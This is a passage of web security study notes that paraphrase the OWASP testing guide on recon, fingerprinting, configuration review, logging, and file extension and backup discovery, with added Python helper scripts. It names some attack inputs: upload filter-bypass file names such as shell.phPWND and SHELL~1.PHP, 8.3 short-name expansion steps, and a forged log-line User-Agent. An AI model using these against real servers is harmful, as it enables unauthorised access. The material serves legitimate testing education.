5. Identify all the parameters of the query string. These usually are in a pair format, such as foo=bar. Also note that many parameters can be in one query string, separated by a &, ~, :, or any other special character or encoding.
6. Also pay attention to any additional or custom type headers not typically seen (such as debug: false).
Responses
1. Identify where new cookies are set (Set-Cookie header), modified, or added to.
2. Identify where there are any redirects (3xx HTTP status code), 400 status codes, in particular 403 Forbidden, and 500 internal server errors during normal responses (i.e., unmodified requests).
3. Also note where any interesting headers are used. For example, Server: BIG-IP indicates that the site is load balanced. Thus, if a site is load balanced and one server is incorrectly configured, then the tester might have to make multiple requests to access the vulnerable server, depending on the type of load balancing used.
✅ Tools Burpsuite/ZAP
Note- I am making notes from the official OWASP website, you can check it from here https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just sharing what I learn to help others !!!
#infosec #learn365 #owasp
================================================ FILE: Resources/Day 19 Task.md ================================================
🎯 Day 19 Task
✅ Github Recon
https://orwaatyat.medium.com/your-full-map-to-github-recon-and-leaks-exposure-860c37ca2c82
https://nitter.net/therceman/status/1434587086011748354
✅ 4.1.7 Map Execution Paths Through Application
Test Objectives
Map the target application and understand the principal workflows.
How to Test
1. Path - Test each of the paths through an application, including combinatorial and boundary value analysis testing for each decision path.
2. Data Flow - Focuses on mapping the flow, transformation and use of data throughout an application.
3. Race - Tests multiple concurrent instances of the application manipulating the same data.
✅ Tools
Automatic Spidering (BurpSuite/ZAP) - an automatic spider is a tool used to automatically discover new resources (URLs) on a particular website.
Note- I am making notes from the official OWASP website, you can check it from here https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just sharing what I learn to help others !!!
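To put the Day 18 entry-point checklist into practice (GET vs POST, query and body parameters, hidden form fields, custom headers), the following added example, not code from the Learn365 repo or from OWASP, parses a constructed raw request and the form page it was submitted from, then reports where each parameter name came from. The host www.example.test, the parameter names and the X-Debug-Mode header are assumptions made for illustration; the point is that a name such as is_admin, which appears only as a hidden field, is still an entry point worth tampering with:

```python
"""Enumerate request parameters and hidden form fields from a raw request and a page (added example)."""
from html.parser import HTMLParser
from urllib.parse import parse_qsl, urlsplit

# Header names that are always present; anything else is worth a second look
# (the WSTG example is a "debug: false" style custom header).
STANDARD_HEADERS = {
    "host", "user-agent", "accept", "accept-language", "accept-encoding",
    "connection", "content-type", "content-length", "cookie", "referer",
    "origin", "cache-control", "pragma", "upgrade-insecure-requests",
}

# Constructed request and page; hypothetical host and parameter names.
RAW_REQUEST = (
    "POST /account/update?id=1337&debug= HTTP/1.1\r\n"
    "Host: www.example.test\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Cookie: session=constructed\r\n"
    "X-Debug-Mode: false\r\n"
    "Content-Length: 32\r\n"
    "\r\n"
    "email=a%40b.test&role=user&csrf="
)

SAMPLE_HTML = """<form method="post" action="/account/update">
  <input type="text" name="email">
  <input type="hidden" name="role" value="user">
  <input type="hidden" name="is_admin" value="0">
  <input type="submit" value="Save">
</form>"""


class HiddenFieldFinder(HTMLParser):
    """Collect form actions and <input type="hidden"> name/value pairs."""

    def __init__(self):
        super().__init__()
        self.hidden = []
        self.actions = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.actions.append((a.get("method", "get").upper(), a.get("action", "")))
        elif tag == "input" and (a.get("type") or "").lower() == "hidden":
            self.hidden.append((a.get("name"), a.get("value")))


def find_hidden_fields(html):
    finder = HiddenFieldFinder()
    finder.feed(html)
    return finder.hidden, finder.actions


def parse_raw_request(raw):
    """Split a raw HTTP/1.1 request into method, path, query params, body params and custom headers."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    split = urlsplit(target)
    body_params = []
    if headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        body_params = parse_qsl(body, keep_blank_values=True)  # blank values are still entry points
    return {
        "method": method,
        "path": split.path,
        "query": parse_qsl(split.query, keep_blank_values=True),
        "body": body_params,
        "custom_headers": {k: v for k, v in headers.items() if k not in STANDARD_HEADERS},
    }


def entry_points(raw_request, html):
    """Every parameter name seen anywhere, tagged with where it came from."""
    req = parse_raw_request(raw_request)
    hidden, _ = find_hidden_fields(html)
    sources = {}
    for name, _ in req["query"]:
        sources.setdefault(name, set()).add("query")
    for name, _ in req["body"]:
        sources.setdefault(name, set()).add("body")
    for name, _ in hidden:
        sources.setdefault(name, set()).add("hidden")
    for name in req["custom_headers"]:
        sources.setdefault(name, set()).add("header")
    return sources


if __name__ == "__main__":
    for name, where in sorted(entry_points(RAW_REQUEST, SAMPLE_HTML).items()):
        print(f"{name:<14} {', '.join(sorted(where))}")
```

Run it against requests exported from Burp or ZAP; the names tagged only "hidden" (here is_admin) and the blank ones (debug, csrf) are the first candidates for manipulation.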
#infosec #learn365 #owasp ================================================ FILE: Resources/Day 20 Task.md ================================================ 🎯 Day 20 Task ✅ Recon Techniques https://securib.ee/beelog/the-best-bug-bounty-recon-methodology/ https://www.bugcrowd.com/resources/webinars/practical-recon-techniques-for-bug-hunters-pen-testers/ https://infosecsanyam.medium.com/bug-bounty-methodology-ttp-tactics-techniques-and-procedures-v-2-0-2ccd9d7eb2e2 ✅ TryHackMe Room https://tryhackme.com/room/pythonbasics ✅ 4.1.8 Fingerprint Web Application Framework Test Objectives Fingerprint the components being used by the web applications. How to Test 1. HTTP headers 2. Cookies 3. HTML source code 4. Specific files and folders 5. File extensions 6. Error messages ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ 1. HTTP headers - Identifying a web framework by **X-Powered-By** field in the HTTP response header. Use netcat command - **nc 127.0.0.1 80** This methodology doesn’t work in 100% of cases,It is possible to easily disable **X-Powered-By** header by a proper configuration. 2. Cookies - Identifying a web framework by Cookies field in the HTTP request header but it is possible to change the name of cookies 3. HTML Source Code 4. Specific Files and Folders - Use directory brute forcing on a target with known folder and filenames and monitoring HTTP-responses to enumerate server content. 5. File Extensions : Here are some common web file extensions and associated technologies: .php – PHP .aspx – Microsoft ASP.NET .jsp – Java Server Pages 6. Error Messages You can see the Error Messages on the Web page ✅ Tools 1. WhatWeb 2. 
Wappalyzer ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Note- I am making notes from Official OWASP Website you can check it from here https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/ I am just Sharing what I learn for help Other's !!! #infosec #learn365 #owasp ================================================ FILE: Resources/Day 21 Task.md ================================================ 🎯 Day 21 Task ✅ 4.1.9 Fingerprint Web Application (Merged into 4.1.8) ✅ THM Room https://tryhackme.com/room/historyofmalware ✅ 4.1.10 Map Application Architecture Test Objectives Understand the architecture of the application and the technologies in use. How to Test 1. Web Server Simple applications may run on a single server, which can be identified by Date, Server, Last-Modified, ETag, Accept-Ranges, Content-Length, Connection, Content-Type 2. Platform-as-a-Service (PaaS) It is possible to identify the use of PaaS, as the application may use a specific domain name (for example, applications deployed on Azure App Services will have a *.azurewebsites.net domain - although they may also use custom domains) 3. Serverless In a Serverless model, the developers provide code which is directly run on a hosting platform as individual functions, rather than as an traditional larger web application deployed in a webroot. For example, AWS Lambda functions will typically return the following headers: X-Amz-Invocation-Type X-Amz-Log-Type X-Amz-Client-Context 4. Microservices - In a microservice-based totally architecture, the software API is made of more than one discrete offerings, instead of strolling as a monolithic software. The services themselves often run inner bins (normally with Kubernetes). Although they're generally behind a single API gateway and area. 5. 
Static Storage - Many applications store static content on dedicated storage platforms, rather than hosting it directly on the main web server. The two most common platforms are Amazon’s S3 Buckets, and Azure’s Storage Accounts, and can be easily identified by the domain names: 1. Amazon S3 Buckets are either BUCKET.s3.amazonaws.com or s3.REGION.amazonaws.com/BUCKET 2. Azure Storage Accounts are ACCOUNT.blob.core.windows.net 6. Database - a. Port scanning the server and looking for any open ports associated with specific databases. b. Triggering SQL (or NoSQL) related error messages (or finding existing errors from a search engine. Other Database - Windows, IIS and ASP.NET often use Microsoft SQL server. Embedded systems often use SQLite. PHP often uses MySQL or PostgreSQL. APEX often uses Oracle. 7. Authentication a. Web server configuration b. Local user accounts in a database. c. An existing central authentication source such as Active Directory or an LDAP server d. Single Sign-On (SSO) with either an internal or external provider. 8. Third Party Services and APIs Almost all web applications include third party resources that are loaded or interacted with by the client. These can include: a.Active content (such as scripts, style sheets, fonts, and iframes). b.Passive content (such as images and videos). c.External APIs. d.Social media buttons. e.Advertising networks. f.Payment gateways. Network Components 1. Reverse Proxy a. Acting as a load balancer or web application firewall. b. Allowing multiple applications to be hosted on a single IP address or domain (in subfolders). c. Implementing IP filtering or other restrictions. d. Caching content from the back end to improve performance. It is not always possible to detect a reverse proxy (especially if there is only a application behind it), but you can often sometimes identify it by: a. 
A mismatch between the front end server and the back end application (such as a Server: nginx header with an ASP.NET application). This can sometimes lead to request smuggling vulnerabilities.
b. Duplicate headers (especially the Server header).
c. Multiple applications hosted on the same IP address or domain (especially if they use different languages).

Load Balancer

Load balancers can be difficult to detect, but can sometimes be identified by making multiple requests and examining the responses for differences, such as:

a. Inconsistent system times.
b. Different internal IP addresses or hostnames in detailed error messages.
c. Different addresses returned from Server-Side Request Forgery (SSRF).

Content Delivery Network (CDN)

When testing a site behind a CDN, you should bear in mind the following points:

a. The IPs and servers belong to the CDN provider, and are likely to be out of scope for infrastructure testing.
b. Many CDNs also include features like bot detection, rate limiting, and web application firewalls.
c. CDNs usually cache content, so any changes made to the back end website may not appear immediately.

Security Components

1. Network Firewall

Most web servers will be protected by a packet filtering or stateful inspection firewall, which blocks any network traffic that is not required. To detect this, perform a port scan of the server and examine the results.

2. Web Application Firewall (WAF)

A WAF can be deployed in multiple locations, including:

a. On the web server itself.
b. On a separate virtual machine or hardware appliance.
c. In the cloud in front of the back end server.

If a cloud-based WAF is in use, then it may be possible to bypass it by directly accessing the back end server, using the same methods discussed in the Content Delivery Network section.
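The indicators above (Lambda headers, storage and PaaS hostnames, duplicate or mismatched Server headers) turned into a small classifier, as an added example for these notes rather than code from the Learn365 repo or OWASP. The sample responses are constructed, and using X-Powered-By: ASP.NET to recognise an ASP.NET back end is an assumption of the example.

```python
"""Infer architecture components from one HTTP response and the hostnames
its page loads static assets from, using the indicators in WSTG 4.1.10.

Added example for these notes; not code from the Learn365 repo or OWASP.
The sample responses are constructed, and the X-Powered-By: ASP.NET check
is an assumption about how an ASP.NET back end announces itself."""
from typing import List, Optional, Tuple

Header = Tuple[str, str]  # (name, value); duplicate names are kept on purpose

HOST_SUFFIXES = {
    ".s3.amazonaws.com": "Static storage: Amazon S3 bucket",
    ".blob.core.windows.net": "Static storage: Azure Storage Account",
    ".azurewebsites.net": "PaaS: Azure App Service",
}
LAMBDA_HEADERS = {"x-amz-invocation-type", "x-amz-log-type", "x-amz-client-context"}


def classify_host(host: str) -> Optional[str]:
    """Map a hostname to a platform label, or None if it reveals nothing."""
    h = host.lower().rstrip(".")
    # Path-style buckets look like s3.REGION.amazonaws.com/BUCKET.
    if h.startswith("s3.") and h.endswith(".amazonaws.com"):
        return HOST_SUFFIXES[".s3.amazonaws.com"]
    for suffix, label in HOST_SUFFIXES.items():
        if h.endswith(suffix):
            return label
    return None


def infer_architecture(headers: List[Header], asset_hosts: List[str]) -> List[str]:
    """Return the architecture findings for one response, in a stable order."""
    findings: List[str] = []
    names = [n.lower() for n, _ in headers]
    values = {n.lower(): v for n, v in headers}  # on duplicates the last value wins

    if LAMBDA_HEADERS & set(names):
        findings.append("Serverless: AWS Lambda (X-Amz-* headers)")

    # Reverse-proxy indicators from the notes: a duplicated Server header, or a
    # front end such as nginx answering for an ASP.NET (IIS-hosted) back end.
    if names.count("server") > 1:
        findings.append("Reverse proxy: duplicate Server header")
    server = values.get("server", "")
    if server and "asp.net" in values.get("x-powered-by", "").lower() and "iis" not in server.lower():
        findings.append(f"Reverse proxy: Server '{server}' in front of an ASP.NET back end")

    for host in asset_hosts:
        label = classify_host(host)
        if label and label not in findings:
            findings.append(label)

    if not findings and server:
        findings.append(f"Single web server: {server}")
    return findings


# Constructed sample responses (not captured from any real host).
PROXIED_ASPNET = [("Server", "nginx"), ("X-Powered-By", "ASP.NET"), ("Content-Type", "text/html")]
PROXIED_ASSETS = ["cdn-assets.s3.amazonaws.com", "acct.blob.core.windows.net"]
LAMBDA_RESPONSE = [("X-Amz-Invocation-Type", "RequestResponse"), ("Content-Type", "application/json")]
PLAIN_RESPONSE = [("Server", "Apache/2.4.41"), ("Date", "Mon, 01 Jan 2024 00:00:00 GMT")]

if __name__ == "__main__":
    for sample, hosts in ((PROXIED_ASPNET, PROXIED_ASSETS), (LAMBDA_RESPONSE, []), (PLAIN_RESPONSE, [])):
        print(infer_architecture(sample, hosts))
```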
Github Repo https://github.com/Imran407704/Learn365

Note - I am making notes from the official OWASP website; you can check it here: https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/ I am just sharing what I learn to help others!!!

#infosec #learn365 #owasp

================================================
FILE: Resources/Day 22 Task.md
================================================

🎯 Day 22 Task

✅ 4.1.10 Map Application Architecture (Completed)

✅ THM Room https://tryhackme.com/room/investigatingwindows

✅ 4.2 Configuration and Deployment Management Testing

Test Objectives

1. Review the applications' configurations set across the network and validate that they are not vulnerable.
2. Validate that used frameworks and systems are secure and not susceptible to known vulnerabilities due to unmaintained software or default settings and credentials.

Read the website for a better understanding! https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/01-Test_Network_Infrastructure_Configuration

Note - I am making notes from the official OWASP website; you can check it here: https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/ I am just sharing what I learn to help others!!!

#infosec #learn365 #owasp

================================================
FILE: Resources/Day 23 Task.md
================================================

🎯 Day 23 Task

✅ THM Room https://tryhackme.com/room/attacktivedirectory

✅ 4.2.2 Test Application Platform Configuration

Test Objectives

1. Ensure that defaults and known files have been removed.
2. Validate that no debugging code or extensions are left in the production environments.
3. Review the logging mechanisms set in place for the application.
How to Test

Black-Box Testing

Sample and Known Files and Directories

Many web servers and application servers provide, in a default installation, sample applications and files for the benefit of the developer and in order to test that the server is working properly right after installation. However, many default web server applications have later been found to be vulnerable. This was the case, for example, for CVE-1999-0449 (Denial of Service in IIS when the Exair sample site had been installed).

Comment Review

It is very common for programmers to add comments when developing large web-based applications. However, comments included inline in HTML code might reveal internal information that should not be available to an attacker. Sometimes, even source code is commented out since a functionality is no longer required, but this comment is leaked out to the HTML pages returned to the users unintentionally.

System Configuration

Various tools, documents, or checklists can be used to give IT and security professionals a detailed assessment of target systems' conformance to various configuration baselines or benchmarks.

Gray-Box Testing

Configuration Review

The web server or application server configuration plays an important role in protecting the contents of the site and it must be carefully reviewed in order to spot common configuration mistakes. It is impossible to say generically how a server should be configured; however, some common guidelines should be taken into account:

1. Make sure the server software properly logs both legitimate access and errors.
2. Make sure that the server is configured to properly handle overloads and prevent Denial of Service attacks. Ensure that the server has been performance-tuned properly.
3. Never grant non-administrative identities (with the exception of NT SERVICE\WMSvc) access to applicationHost.config, redirection.config, and administration.config (either Read or Write access).
This includes Network Service, IIS_IUSRS, IUSR, or any custom identity used by IIS application pools. IIS worker processes are not meant to access any of these files directly.
4. Never share out applicationHost.config, redirection.config, and administration.config on the network. When using Shared Configuration, prefer to export applicationHost.config to another location (see the section titled "Setting Permissions for Shared Configuration").
5. Keep in mind that all users can read .NET Framework machine.config and root web.config files by default. Do not store sensitive information in these files if it should be for administrator eyes only.
6. Do not grant Write access to the identity that the Web server uses to access the shared applicationHost.config. This identity should have only Read access.

Logging

Logging is an important asset of the security of an application architecture, since it can be used to detect flaws in applications (users constantly trying to retrieve a file that does not really exist) as well as sustained attacks from rogue users.

1. Do the logs contain sensitive information?
2. Are the logs stored on a dedicated server?
3. Can log usage generate a Denial of Service condition?
4. How are they rotated? Are logs kept for a sufficient time?
5. How are logs reviewed? Can administrators use these reviews to detect targeted attacks?
6. How are log backups preserved?
7. Is the data being logged validated (min/max length, chars, etc.) prior to being logged?

Sensitive Information in Logs

Some applications might, for example, use GET requests to forward form data, which will then be seen in the server logs. This means that server logs might contain sensitive information (such as usernames and passwords, or bank account details).
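Checks 1 and 7 of the logging list above, applied at the point where a log line is built: redact form data that arrives in a GET query string, and validate each field (no control characters, bounded length) before it is written. This is an added example for these notes, not code from the Learn365 repo or OWASP; the parameter names and sample requests are constructed.

```python
"""Keep sensitive and attacker-controlled data out of server logs: redact
sensitive GET query parameters, neutralise control characters that would
forge extra log lines, and bound field length before anything is written.

Added example for these notes, not code from the Learn365 repo or OWASP;
the parameter names and the sample requests are constructed."""
import re
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Query parameters whose values must never reach a log file (constructed list).
SENSITIVE_PARAMS = {"password", "passwd", "pwd", "token", "session", "account", "iban", "card"}
MAX_FIELD_LEN = 512
_CONTROL = re.compile(r"[\x00-\x1f\x7f]")  # CR and LF are the usual log-injection bytes


def redact_query(url: str) -> str:
    """Replace the value of every sensitive query parameter with REDACTED."""
    parts = urlsplit(url)
    pairs = [(k, "REDACTED" if k.lower() in SENSITIVE_PARAMS else v)
             for k, v in parse_qsl(parts.query, keep_blank_values=True)]
    return urlunsplit(parts._replace(query=urlencode(pairs)))


def clean_field(value: str) -> str:
    """Validate a field before logging: no control characters, bounded length."""
    value = _CONTROL.sub("?", value)
    if len(value) > MAX_FIELD_LEN:
        value = value[:MAX_FIELD_LEN] + "...[truncated]"
    return value


def log_line(client_ip: str, method: str, url: str, status: int, user_agent: str) -> str:
    """Build one access-log line in which no field can contain a newline."""
    return " ".join([
        clean_field(client_ip),
        clean_field(method),
        clean_field(redact_query(url)),
        str(status),
        '"' + clean_field(user_agent) + '"',
    ])


# Constructed sample requests: a login form submitted with GET, and a
# User-Agent that tries to append a forged second log entry.
SAMPLE_REQUESTS = [
    ("203.0.113.5", "GET", "/login?user=alice&password=hunter2&next=%2Fhome", 302, "Mozilla/5.0"),
    ("203.0.113.9", "GET", "/search?q=shoes", 200, "curl/8.0\r\n203.0.113.1 GET /admin 200"),
]

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(log_line(*req))
```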
This sensitive information can be misused by an attacker if they obtain the logs, for example, through administrative interfaces or known web server vulnerabilities or misconfiguration (like the well-known server-status misconfiguration in Apache-based HTTP servers).

Event logs will often contain data that is useful to an attacker (information leakage) or can be used directly in exploits:

- Debug information
- Stack traces
- Usernames
- System component names
- Internal IP addresses
- Less sensitive personal data (e.g. email addresses, postal addresses and telephone numbers associated with named individuals)
- Business data

Also, in some jurisdictions, storing some sensitive information in log files, such as personal data, might oblige the enterprise to apply the data protection laws that they would apply to their back-end databases to log files too. And failure to do so, even unknowingly, might carry penalties under the data protection laws that apply.

Log Location

Typically servers will generate local logs of their actions and errors, consuming the disk of the system the server is running on. However, if the server is compromised its logs can be wiped out by the intruder to clean up all the traces of its attack and methods. If this were to happen the system administrator would have no knowledge of how the attack occurred or where the attack source was located. Actually, most attacker tool kits include a "log zapper" that is capable of cleaning up any logs that hold given information (like the IP address of the attacker), and these are routinely used in attackers' system-level root kits.

Log Storage

Logs can introduce a Denial of Service condition if they are not properly stored. Any attacker with sufficient resources could be able to produce a sufficient number of requests that would fill up the allocated space for log files, if they are not specifically prevented from doing so.
However, if the server is not properly configured, the log files will be stored in the same disk partition as the one used for the operating system software or the application itself. This means that if the disk were to be filled up the operating system or the application might fail because it is unable to write to disk.

Log Rotation

Most servers (but few custom applications) will rotate logs in order to prevent them from filling up the file system they reside on. The assumption when rotating logs is that the information in them is only necessary for a limited amount of time. This feature should be tested in order to ensure that:

1. Logs are kept for the time defined in the security policy, not more and not less.
2. Logs are compressed once rotated (this is a convenience, since it will mean that more logs will be stored for the same available disk space).
3. File system permissions of rotated log files are the same as (or stricter than) those of the log files themselves. For example, web servers will need to write to the logs they use but they don't actually need to write to rotated logs, which means that the permissions of the files can be changed upon rotation to prevent the web server process from modifying these.

Log Access Control

Event log information should never be visible to end users. Even web administrators should not be able to see such logs since it breaks separation of duty controls. Ensure that any access control schema that is used to protect access to raw logs and any applications providing capabilities to view or search the logs is not linked with access control schemas for other application user roles. Neither should any log data be viewable by unauthenticated users.

Note - I am making notes from the official OWASP website; you can check it here: https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/ I am just sharing what I learn to help others!!!
#infosec #learn365 #owasp

================================================
FILE: Resources/Day 24 Task.md
================================================

🎯 Day 24 Task

✅ THM Room https://tryhackme.com/room/vulnversity

✅ 4.2.3 Test File Extensions Handling for Sensitive Information

Test Objectives

1. Dirbust sensitive file extensions, or extensions that might contain raw data (e.g. scripts, raw data, credentials, etc.).
2. Validate that no system framework bypasses exist on the rules set.

How to Test

Forced Browsing

Submit requests with different file extensions and verify how they are handled. The verification should be on a per web directory basis. Verify directories that allow script execution. Web server directories can be identified by scanning tools which look for the presence of well-known directories. In addition, mirroring the web site structure allows the tester to reconstruct the tree of web directories served by the application.

If the web application architecture is load-balanced, it is important to assess all of the web servers. This may or may not be easy, depending on the configuration of the balancing infrastructure. In an infrastructure with redundant components there may be slight variations in the configuration of individual web or application servers. This may happen if the web architecture employs heterogeneous technologies (think of a set of IIS and Apache web servers in a load-balancing configuration, which may introduce slight asymmetric behavior between them, and possibly different vulnerabilities).

Example

The tester has identified the existence of a file named connection.inc. Trying to access it directly gives back its contents, which are:

```
<?php
mysql_connect("127.0.0.1", "root", "password") or die("Could not connect");
?>
```

The following file extensions should never be returned by a web server, since they are related to files which may contain sensitive information or to files for which there is no reason to be served.

File Upload

1.
file.phtml gets processed as PHP code.
2. FILE~1.PHT is served, but not processed by the PHP ISAPI handler.
3. shell.phPWND can be uploaded.
4. SHELL~1.PHP will be expanded and returned by the OS shell, then processed by the PHP ISAPI handler.

Gray-Box Testing

Performing white-box testing against file extensions handling amounts to checking the configurations of web servers or application servers taking part in the web application architecture, and verifying how they are instructed to serve different file extensions. If the web application relies on a load-balanced, heterogeneous infrastructure, determine whether this may introduce different behavior.

✅ Tools

- HTTrack
- wget
- curl

Note - I am making notes from the official OWASP website; you can check it here: https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/ I am just sharing what I learn to help others!!!

#infosec #learn365 #owasp

================================================
FILE: Resources/Day 25 Task.md
================================================

🎯 Day 25 Task

✅ THM Room https://tryhackme.com/room/principlesofsecurity

✅ 4.2.4 Review Old Backup and Unreferenced Files for Sensitive Information

Test Objectives

Find and analyse unreferenced files that might contain sensitive information.

How to Test

Black-Box Testing

Inference from the Naming Scheme Used for Published Content

Enumerate all of the application's pages and functionality. This can be done manually using a browser, or using an application spidering tool. Most applications use a recognizable naming scheme, and organize resources into pages and directories using words that describe their function. From the naming scheme used for published content, it is often possible to infer the name and location of unreferenced pages. For example, if a page viewuser.asp is found, then look also for edituser.asp, adduser.asp and deleteuser.asp.
If a directory /app/user is found, then look also for /app/admin and /app/manager.

Other Clues in Published Content

Many web applications leave clues in published content that can lead to the discovery of hidden pages and functionality. These clues often appear in the source code of HTML and JavaScript files. The source code for all published content should be manually reviewed to identify clues about other pages and functionality. For example:

Programmers' comments and commented-out sections of source code may refer to hidden content:

```
```

JavaScript may contain page links that are only rendered within the user's GUI under certain circumstances:

```
var adminUser=false;
if (adminUser) menu.add (new menuItem ("Maintain users", "/admin/useradmin.jsp"));
```

HTML pages may contain FORMs that have been hidden by disabling the SUBMIT element:

```
```

Another source of clues about unreferenced directories is the /robots.txt file used to provide instructions to web robots:

```
User-agent: *
Disallow: /Admin
Disallow: /uploads
Disallow: /backup
Disallow: /~jbloggs
Disallow: /include
```

Blind Guessing

1. Identify the file extensions in use within known areas of the application (e.g. jsp, aspx, html), and use a basic wordlist appended with each of these extensions (or use a longer list of common extensions if resources permit).
2. For each file identified through other enumeration techniques, create a custom wordlist derived from that filename. Get a list of common file extensions (including ~, bak, txt, src, dev, old, inc, orig, copy, tmp, swp, etc.) and use each extension before, after, and instead of, the extension of the actual filename.

Information Obtained Through Server Vulnerabilities and Misconfiguration

The most obvious way in which a misconfigured server may disclose unreferenced pages is through directory listing. Request all enumerated directories to identify any which provide a directory listing.

1. Apache ?M=D directory listing vulnerability.
2. Various IIS script source disclosure vulnerabilities.
3. IIS WebDAV directory listing vulnerabilities.

Use of Publicly Available Information

Pages that used to be referenced may still appear in the archives of Internet search engines. For example, 1998results.asp may no longer be linked from a company's website, but may remain on the server and in search engine databases. This old script may contain vulnerabilities that could be used to compromise the entire site. The site: Google search operator may be used to run a query only against the domain of choice, such as in: site:www.example.com. Using search engines in this way has led to a broad array of techniques which you may find useful and that are described in the Google Hacking section of this Guide. Check it to hone your testing skills via Google.
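Two checks that follow from the Day 24 extension-handling notes (shell.phPWND and FILE~1.PHT slipping past a case-sensitive deny list) and the Day 25 backup-extension list above: the weak deny list beside the allow-list check that should replace it, and an audit of a mirrored web-root listing for backup and include files. Added example for these notes, not code from the Learn365 repo or OWASP; the extension sets and the sample listing are constructed.

```python
"""File-extension checks from WSTG 4.2.3 and 4.2.4: a weak, case-sensitive
upload deny list beside a hardened allow list, and an audit of a web root
listing for names that carry a backup or include extension.

Added example for these notes, not code from the Learn365 repo or OWASP;
the extension sets and the sample listing are constructed."""
import os
from typing import List

# Extensions from the notes' backup/sensitive lists; none should be served.
BACKUP_EXTS = {"inc", "bak", "old", "orig", "copy", "tmp", "swp", "src", "dev", "txt"}
# What an image/document upload endpoint may accept (constructed allow list).
UPLOAD_ALLOW = {".png", ".jpg", ".gif", ".pdf"}


def denylist_allows_upload(filename: str) -> bool:
    """The weak check: reject only an exact, case-sensitive match on .php/.phtml."""
    _, ext = os.path.splitext(filename)
    return ext not in {".php", ".phtml"}  # shell.phPWND and FILE~1.PHT both pass


def allowlist_allows_upload(filename: str) -> bool:
    """The hardened check: one extension only, compared lower-cased, from an allow list."""
    name = os.path.basename(filename).lower()
    _, ext = os.path.splitext(name)
    return ext in UPLOAD_ALLOW and name.count(".") == 1 and "~" not in name


def looks_like_backup(path: str) -> bool:
    """True if any extension in the name (login.php.bak, viewuser.bak.asp,
    .config.php.swp) is a backup extension, or the name ends in ~."""
    base = os.path.basename(path).lower()
    if base.endswith("~"):
        return True
    return any(part in BACKUP_EXTS for part in base.split(".")[1:])


def audit_listing(paths: List[str]) -> List[str]:
    """Return the served paths that should not be reachable from the web root."""
    return [p for p in paths if looks_like_backup(p)]


# Constructed listing of a web root, as a mirroring tool such as wget or
# HTTrack would retrieve it.
SAMPLE_LISTING = [
    "/index.html", "/css/site.css", "/connection.inc", "/login.php.bak",
    "/viewuser.bak.asp", "/viewuser.asp~", "/.config.php.swp", "/app.js",
]

if __name__ == "__main__":
    for name in ("shell.phPWND", "FILE~1.PHT", "avatar.PNG"):
        print(name, denylist_allows_upload(name), allowlist_allows_upload(name))
    print(audit_listing(SAMPLE_LISTING))
```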
Backup files are not likely to be referenced by any other files and therefore may not have been indexed by Google, but if they lie in browsable directories the search engine might know about them.

Filename Filter Bypass

Because deny list filters are based on regular expressions, one can sometimes take advantage of obscure OS filename expansion features which work in ways the developer didn't expect. The tester can sometimes exploit differences in the ways that filenames are parsed by the application, web server, and underlying OS and its filename conventions.

1. Remove incompatible characters
2. Convert spaces to underscores
3. Take the first six characters of the basename
4. Add ~